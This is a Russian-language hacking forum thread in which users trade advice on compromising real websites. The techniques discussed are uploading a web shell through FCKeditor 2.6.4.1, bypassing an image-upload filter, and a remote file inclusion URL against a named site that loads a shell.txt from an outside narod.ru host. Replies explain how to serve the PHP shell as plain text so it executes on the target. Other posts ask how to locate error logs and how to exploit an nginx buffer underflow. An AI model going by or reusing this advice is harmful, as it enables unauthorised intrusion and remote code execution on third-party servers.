Собственно возникло 2 вопроса: 1) Имеется FCKeditor version 2.6.4.1 Build 23187, есть варианты залить shell? 2) Есть форма для загрузки картинок php спокойно грузит, но вот проблема в том что при просмотре выдает: Code: яШяаJFIFяю>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality яЫC $.' ",#(7),01444'9=82<.342яЫC 2!!22222222222222222222222222222222222222222222222222яАъҐ"яД яДµ}!1AQa"q2Ѓ‘Ў#B±БRСр$3br‚ %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzѓ„…†‡€‰Љ’“”•–—™љўЈ¤Ґ¦§Ё©ЄІіґµ¶·ё№єВГДЕЖЗИЙКТУФХЦЧШЩЪбвгдежзийкстуфхцчшщъяД Какие есть варианты это обойти уже и EXIF правил и перехватчиком правил((
Ребят подскажите в чём проблемма? Имеется RFI Code: http://www.basegroup.su/index.php?Page= но когда подставляю ссыль на свой шелл,то всё выводит,но выполняет на моём серваке,а не на сайте. Подскажите как решить проблемму?
1) Твой сервер не должен поддерживать php (narod.ya.ru идеален) 2) Шелл должен быть вида shell.txt Удачи P.S У меня все работает))!
Не совсем так. Правильнее будет сказать, что сервер должен отдавать php в формате plain-text. А использовать narod.ru или положить в корень своего сайта .htaccess - ваше дело. По сути подойдёт любой сторонний шелл и пара строчек в корне папки. Совсем не обязательно иметь дело с narod.ru Опять ошибочное суждение. Не важно расширение файла, так как при инклуде любой файл интерпретируется как PHP. Важно, лишь чтобы файл не интерпретировался на дочернем сайте. Но об этом я писал выше.
не знаю чё такое у меня ставлю http://www.basegroup.su/index.php?Page=site.narod.ru/shell.txt просто пустая страница,а в исходнике код и всё
такой вопросец, не очень знаком с файлами настройки хостинга, но можно както в etc/passwd или php.ini узнать путь к логам ошибок?
Пути к логам ошибок задаются в настройках apache в файле httpd.conf распрастранненые пути файлов настроек сможешь посмотреть сдесь,
В php.ini есть параметр "error_log", он указывает на путь к логам ошибок интерпритации, но как максимум это только FPD.
На хостингах обычно, что естественно, используются логически упорядоченные скелеты конфигураций хостов. Те , что-то вида: /serv/userXXX/conf/vhost.conf и подобное. Тупое спихивание конфигураций в httpd.conf или конфигов массово в папку а-ля sites-enabled способствует ухудшению удобства в настройке и использовании, а так-же не неверно сточки зрения изоляции уникального клиента. То-же касается и php.ini файла. Но это банальная схема для среднестатистического хостинга. Иные конфигурации используются в случаях если система не очень масштабна или следование логически верным построениям конфигурации системы не очень строги. Опять-же, излишняя унификация не столь необходима в случаях небольшого количества виртуальных хостов на сервере.
как использовать эту уязвимость? Nginx buffer underflow vulnerability Вот читал про нее: http://www.securelist.com/ru/advisories/36751 Хелп, нашел в одной игре)